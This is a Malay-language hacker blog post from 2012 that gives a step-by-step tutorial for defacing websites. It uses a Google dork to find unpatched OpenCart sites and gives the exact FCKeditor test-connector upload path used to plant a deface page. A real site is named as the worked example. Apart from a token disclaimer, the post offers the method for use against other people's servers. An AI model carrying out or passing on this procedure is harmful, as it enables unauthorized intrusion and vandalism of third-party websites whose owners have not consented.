:: DARKJIWA.BLOGSPOT.COM ::
The Tormented Kingdom Of Webnet
free counters

WE ARE MALAYSIAN HACKERS.NOTHING IS SECURE WHEN WE TOGETHER.
[+] Post Title :

Deface website use FCKeditor(Tutorial)


[+] Date : 01 March 2012
[+] Author : darkjiwa
[+] Link : http://darkjiwa.blogspot.com/2012/03/deface-website-use-fckeditortutorial.html
[+] Type :
Hai Assalamualaikum,
hari ni gua nak ajar korang camne nak deface site :)
tapi ini hanya untuk pengetahuan je ok
jangan la nak mendajal orang
Lagipunn Tuhan(Allah) marah
Ok mari kita mulakan!
First stepp, korang buat coding html(untuk deface site)
tak tahu camne nak buat?
ok,korang boleh belaja kat sini http://www.w3schools.com/html/
ATAU pun guna deface generator ni http://adf.ly/3bku4 password:juliehf
Lepas selesai buat coding, korang kena save as [apaapanama.html]
yang penting belakang mesti .html
ape ape nama la yang korang suka, korang boleh letak
Okay,
second step,korang kena cari website yang ada vulnerability
so, pergi http://www.google.com.my/
dan search google dork ni:
Powered by OpenCart site:.com
korang akan nampak berpuluh malah beratus ratus site yang ade dork seperti di atas. tapi tak semua site yang ada vulnerability
website yang vulnerability adalah website yang belum di-patch oleh admin website tu.


pilih satu site yang keluar kat google tuu.
contoh website:
http://www.inputandanalysis.com/
lepas tuu, korang tambah exploit dekat akhir link website tu
exploit :
/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

website korang akan jadi seperti ini:

http://www.inputandanalysis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

site korang akan jadi seperti ini dan korang tukar connector, dari ASP ke PHP


lepas tuu chose file deface korang
apaapanama.html tuu, then upload 

lepas upload, akan keluar pop up 'file upload with no error' 

Dan akhir sekali, tengok deface korang
Tadi,
site korang macam ni
http://www.inputandanalysis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

so, sekarang korang buang exploit dan tambah dengan nama korang  punya coding html
macam ni, 

http://www.inputandanalysis.com/apaapanama.html

Contoh:
http://www.inputandanalysis.com/Akram.html

Done! Selamat Mencuba! Kalau ade pape just komen kat bawah ok :)
Kredit to: JohnTorono Travolta dan Nurul Hidayah

Assalamualaikum

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)